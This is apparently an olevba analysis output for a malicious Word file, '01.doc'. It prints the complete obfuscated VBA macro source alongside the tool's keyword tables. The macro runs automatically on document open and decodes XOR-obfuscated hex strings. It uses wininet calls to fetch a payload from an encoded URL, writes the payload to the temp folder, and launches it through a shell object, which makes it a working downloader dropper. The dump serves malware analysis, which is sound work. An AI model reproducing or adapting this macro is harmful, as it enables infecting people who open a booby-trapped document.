Malicious Word macro

1. olevba 0.26 - http://decalage.info/python/oletools
2. Flags       Filename                                                        
3. ----------- -----------------------------------------------------------------
4. OLE:MASIHB- 01.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: 01.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: 01.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15.  
16. Sub HARRIS(MARCELINO As Integer)
17. WELDON
18. End Sub
19.  
20. Sub autoopen()
21. HARRIS (332)
22. End Sub
23. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
24. ANALYSIS:
25. +----------+----------+---------------------------------------+
26. | Type     | Keyword  | Description                           |
27. +----------+----------+---------------------------------------+
28. | AutoExec | AutoOpen | Runs when the Word document is opened |
29. +----------+----------+---------------------------------------+
30. -------------------------------------------------------------------------------
31. VBA MACRO MOHAMMAD.bas
32. in file: 01.doc - OLE stream: u'Macros/VBA/MOHAMMAD'
33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
34.  
35.  
36. #If VBA7 And Win64 Then
37. Public Declare PtrSafe Function SHELBY Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As LongPtr) As Long
38. #End If
39.  
40. Public Function KIRBY(ByRef LAZARO As Object, ByRef HOMER As Object) As Boolean
41.  
42. Dim CHARLEY As Long
43. Set LAZARO = TRENTON(RILEY)
44.  
45. Dim ADOLFO
46.  
47. Dim ALPHONSE As String
48. ALPHONSE = MERRILL(4000, HERIBERTO, FEDERICO)
49.  
50. For CHARLEY = 26 To 47
51. CHARLEY = CHARLEY * 12
52. Next CHARLEY
53. ADOLFO = LAZARO & ALPHONSE
54.  
55. If OLLIE(289, ADOLFO) Then
56. End If
57.  
58.  
59. KIRBY = DONOVAN(LAZARO, ALPHONSE, 681)
60.  
61. End Function
62.  
63.  
64. Public Function LINWOOD(CHRISTOPER As String, JEROLD As String) As String
65.    
66.     Dim BARNEY As Integer
67.     Dim NESTOR As Integer
68.    
69.    
70.     Dim JOSIAH As Double
71.  JOSIAH = 312
72. If JOSIAH > JOSIAH * 8 Then End
73.    
74.     Dim FRITZ As Long
75.     Dim BRANT As String
76.     For FRITZ = 1 To (NICKOLAS(JEROLD) / 2)
77.         BARNEY = HOLLIS(JEROLD, FRITZ)
78.         NESTOR = QUINCY(CHRISTOPER, FRITZ)
79.         BRANT = BRANT + CARMELO(BARNEY, NESTOR)
80.     Next FRITZ
81.    LINWOOD = BRANT
82. End Function
83. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
84. ANALYSIS:
85. +------------+-------------+-------------------------+
86. | Type       | Keyword     | Description             |
87. +------------+-------------+-------------------------+
88. | Suspicious | Lib         | May run code from a DLL |
89. | IOC        | wininet.dll | Executable file name    |
90. +------------+-------------+-------------------------+
91. -------------------------------------------------------------------------------
92. VBA MACRO MILLARD.bas
93. in file: 01.doc - OLE stream: u'Macros/VBA/MILLARD'
94. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
95.  
96.  
97.  
98. Public Function RILEY() As Object
99. Dim ISMAEL As String
100. ISMAEL = LINWOOD(HERIBERTO, PORFIRIO)
101. Set RILEY = CreateObject(ISMAEL)
102. End Function
103.  
104.  
105. Public Function HOLLIS(ByRef JEROLD As String, ByRef FRITZ As Long) As Double
106.  HOLLIS = ANIBAL("&H" & (MAURICIO(78, JEROLD, STEFAN(FRITZ), 2)))
107. End Function
108.  
109.  
110. Public Function STEFAN(ByRef FRITZ As Long) As Long
111.  STEFAN = (2 * FRITZ) - 1
112. End Function
113.  
114.  
115. #If VBA7 And Win64 Then
116.        Public Function BASIL(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
117.     #Else
118.        Public Function BASIL(ByRef GRADY As Long, NOAH As Long) As Boolean
119.     #End If
120.         Dim JACQUES As Double
121. Dim GUADALUPE As String
122. Dim CLARK As Long
123.     GUADALUPE = MERRILL(893, HERIBERTO, ULYSSES)
124.  
125. For JACQUES = 22 To 122
126. JACQUES = JACQUES + 2.25
127. Next JACQUES
128.     GRADY = BERNARDO(NOAH, GUADALUPE, vbNullString, 0, MAXWELL, 0)
129.     BASIL = True
130. End Function
131.  
132.  
133. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
134. ANALYSIS:
135. +------------+--------------+--------------------------+
136. | Type       | Keyword      | Description              |
137. +------------+--------------+--------------------------+
138. | Suspicious | CreateObject | May create an OLE object |
139. +------------+--------------+--------------------------+
140. -------------------------------------------------------------------------------
141. VBA MACRO MARIANO.bas
142. in file: 01.doc - OLE stream: u'Macros/VBA/MARIANO'
143. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
144.  
145.  
146.  
147. Public Function NICKOLAS(CLEMENT As String) As Long
148. NICKOLAS = Len(CLEMENT)
149. End Function
150.  
151. Public Function ANIBAL(FRANCES As String) As Double
152. Dim DILLON As Double
153. For DILLON = 26 To 29
154. DILLON = DILLON * 6.127
155. Next DILLON
156. DILLON = Val(FRANCES)
157. ANIBAL = DILLON
158. End Function
159.  
160. Public Function TRENTON(ByRef NICHOLAS As Object) As Object
161. Set TRENTON = NICHOLAS.GetSpecialFolder(2)
162. End Function
163.  
164.  
165.  
166. Public Function OLLIE(WYATT As Long, ByVal ELVIS As String) As Boolean
167.     #If VBA7 And Win64 Then
168.         Dim LANNY As LongPtr, EZRA As LongPtr
169.     #Else
170.         Dim LANNY As Long, EZRA As Long
171.     #End If
172.     Dim SYDNEY As Long
173.     Dim RUBIN As String * DONNELL, ALPHONSO As String
174.     Dim REED As Integer, ELMO As Double
175.     LANNY = HIRAM
176.     If LANNY = 0 Then
177.         Exit Function
178.     End If
179.     Dim KAREEM As Boolean
180.    
181.     If BASIL(EZRA, LANNY) Then
182.     End If
183.     If EZRA = 0 Then
184.         ELMO = 0
185.     Else
186.         JEFFERSON EZRA, RUBIN, DONNELL, SYDNEY
187.         ALPHONSO = RUBIN
188.           Dim GAIL As Long
189.           GAIL = 10
190.           GAIL = GAIL + 11
191. If GAIL > GAIL + 112 Then End
192.         Do While SYDNEY <> 0
193.             JEFFERSON EZRA, RUBIN, DONNELL, SYDNEY
194.                     ALPHONSO = ALPHONSO + Mid(RUBIN, 1, SYDNEY)
195.         Loop
196.              ELMO = NICKOLAS(ALPHONSO): _
197.              REED = MAYNARD("JOSEF")
198.         Open ELVIS _
199.             For Binary _
200.         Lock Write As #REED
201.         Put #REED, , ALPHONSO
202.         GAIL = GAIL + 127
203.     If GAIL < 0 Then End
204.         Close #REED
205.     End If
206.     SHELBY EZRA
207.     SHELBY LANNY
208.     ALPHONSO = ""
209.     If ELMO Then
210.         OLLIE = True
211.     End If
212. End Function
213.  
214. Public Function DONOVAN(ByRef LAZARO As Object, ByRef ALPHONSE As String, RANDELL As Double) As Boolean
215.  
216. Set LENNY = CreateObject(LINWOOD _
217. (HERIBERTO, SEBASTIAN))
218. Dim DUSTY As Integer
219. DUSTY = LENNY.Open(LAZARO & ALPHONSE)
220. End Function
221.  
222. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
223. ANALYSIS:
224. +------------+--------------+-----------------------------------------+
225. | Type       | Keyword      | Description                             |
226. +------------+--------------+-----------------------------------------+
227. | Suspicious | Open         | May open a file                         |
228. | Suspicious | CreateObject | May create an OLE object                |
229. | Suspicious | Binary       | May read or write a binary file (if     |
230. |            |              | combined with Open)                     |
231. | Suspicious | Write        | May write to a file (if combined with   |
232. |            |              | Open)                                   |
233. | Suspicious | Put          | May write to a file (if combined with   |
234. |            |              | Open)                                   |
235. +------------+--------------+-----------------------------------------+
236. -------------------------------------------------------------------------------
237. VBA MACRO MARY.bas
238. in file: 01.doc - OLE stream: u'Macros/VBA/MARY'
239. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
240.  
241. Option Explicit
242.  
243. #If VBA7 And Win64 Then
244. Public Declare PtrSafe Function JEFFERSON Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As LongPtr, ByVal RUBIN As String, ByVal SHELTON As Long, CARSON As Long) As Integer
245. #End If
246. Public Const SEBASTIAN = "163A2B2E236C033935583F26333A2B202C"
247. Public Const FEDERICO = "1925272E2A3B7667204C33"
248. Public Const ULYSSES = "2D263A32756D6D282C5935293B2D292D232C2E6B5739287D7F737E6D767F6B512E20"
249. Public Const PORFIRIO = "16313C2B3F362B27221A102C3E2B113631362C287B342F372D36"
250. Public Const HERIBERTO = "VERNBOBBIE4"
251.  
252.  
253.  
254. Public Function MAYNARD(CLEMENT As String) As Integer
255.     MAYNARD = FreeFile
256. End Function
257.  
258. Public Function QUINCY(ByRef CHRISTOPER As String, ByRef FRITZ As Long) As Integer
259. QUINCY = Asc(MAURICIO(48, CHRISTOPER, ((FRITZ Mod NICKOLAS(CHRISTOPER)) + 1), 1))
260. End Function
261.  
262.  
263. Public Function MERRILL(AUGUSTUS As Long, HILARIO As String, ENRIQUE As String) As String
264. AUGUSTUS = AUGUSTUS * 3
265. MERRILL = LINWOOD(HILARIO, ENRIQUE)
266.    
267. End Function
268.  
269.  
270. Public Sub WELDON()
271.         Dim DEWITT As Double
272.  
273.     Dim ISIDRO As Double
274. For ISIDRO = 53 To 55
275. ISIDRO = ISIDRO + 11
276. Next ISIDRO
277.  
278. JARVIS (1.109)
279.  
280. End Sub
281.  
282. Public Function TRUMAN(REINALDO As Double)
283.  
284. Dim MERRILL As Object
285.  
286.  
287.     Dim JOHNATHON As Long
288. For JOHNATHON = 11 To 86
289. JOHNATHON = JOHNATHON + 55
290. Next JOHNATHON
291.    
292.  
293. Dim WESTON  As Object
294.  
295.  
296. For JOHNATHON = 22 To 33
297. JOHNATHON = JOHNATHON + 64
298. Next JOHNATHON
299.    
300.  
301. Set WESTON = RILEY
302. JOHNATHON = JOHNATHON + 66
303. Dim LEWIS As Boolean
304.  
305. If JOHNATHON > JOHNATHON * 6 Then End
306. LEWIS = KIRBY(MERRILL, WESTON)
307. REINALDO = REINALDO + 47
308. End Function
309.  
310.  
311. Public Function FREDERIC(MERLIN As String)
312. Dim BRENTON As String
313. BRENTON = "YONG"
314. TRUMAN 397 + 1.08
315. BRENTON = BRENTON + "FAUSTINO"
316. End Function
317.  
318.  
319.  
320.  
321.  
322.  
323.  
324. Sub JARVIS(ROSARIO As Double)
325.  
326. FREDERIC ("GAVIN")
327. End Sub
328.  
329. Public Function CARMELO(ByRef BARNEY As Integer, ByRef NESTOR As Integer) As String
330.     Dim CONNIE As Long
331.     CONNIE = BARNEY Xor NESTOR
332.     CARMELO = Chr$(CONNIE)
333. End Function
334.  
335.  
336.  
337.  
338.  
339. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
340. ANALYSIS:
341. +------------+----------------+-----------------------------------------+
342. | Type       | Keyword        | Description                             |
343. +------------+----------------+-----------------------------------------+
344. | Suspicious | Chr            | May attempt to obfuscate specific       |
345. |            |                | strings                                 |
346. | Suspicious | Xor            | May attempt to obfuscate specific       |
347. |            |                | strings                                 |
348. | Suspicious | Lib            | May run code from a DLL                 |
349. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
350. |            |                | be used to obfuscate strings (option    |
351. |            |                | --decode to see all)                    |
352. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
353. |            |                | may be used to obfuscate strings        |
354. |            |                | (option --decode to see all)            |
355. | IOC        | wininet.dll    | Executable file name                    |
356. +------------+----------------+-----------------------------------------+
357. -------------------------------------------------------------------------------
358. VBA MACRO MONROE.bas
359. in file: 01.doc - OLE stream: u'Macros/VBA/MONROE'
360. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
361.  
362.  
363.  
364.  
365.  
366. Public Const JASPER = "RUSSEL"
367. #If VBA7 And Win64 Then
368. Public Declare PtrSafe Function BERNARDO Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MOHAMMED As LongPtr, ByVal SANDY As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As LongPtr
369.  
370. #Else
371. Public Declare Function SHELBY Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As Long) As Long
372. Public Declare Function BOBBIE Lib "wininet.dll" Alias "InternetOpenA" (ByVal ALPHONSO As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As Long
373. Public Declare Function JEFFERSON Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As Long, ByVal RUBIN As String, ByVal SHELTON As Long, CARSON As Long) As Integer
374. Public Declare Function BERNARDO Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MOHAMMED As Long, ByVal SANDY As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As Long
375. #End If
376.  
377. Public Const DONNELL = 4000
378. Public Const DENNY As String = "EMERY"
379. Public Const ALDEN = 1
380. Public Const MAXWELL = &H4000000
381.  
382. #If VBA7 And Win64 Then
383. Public Declare PtrSafe Function BOBBIE Lib "wininet.dll" Alias "InternetOpenA" (ByVal ALPHONSO As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As LongPtr
384. #End If
385.  
386.  
387. Public Function MAURICIO(SAMMY As Long, ByRef CLEMENT As String, ByRef BARNEY As Integer, ByRef NESTOR As Integer) As String
388.     MAURICIO = Mid$(CLEMENT, BARNEY, NESTOR)
389.     SAMMY = SAMMY + 23
390. End Function
391. #If VBA7 _
392.     And Win64 Then
393. Public Function HIRAM() As LongPtr
394.  #Else
395. Public Function HIRAM() As Long
396.  
397.  #End If
398.  
399.  HIRAM = BOBBIE(DENNY, ALDEN, vbNullString, vbNullString, 0)
400. End Function
401.  
402.  
403.  
404.  
405. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
406. ANALYSIS:
407. +------------+----------------+-----------------------------------------+
408. | Type       | Keyword        | Description                             |
409. +------------+----------------+-----------------------------------------+
410. | Suspicious | Lib            | May run code from a DLL                 |
411. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
412. |            |                | may be used to obfuscate strings        |
413. |            |                | (option --decode to see all)            |
414. | IOC        | wininet.dll    | Executable file name                    |
415. +------------+----------------+-----------------------------------------+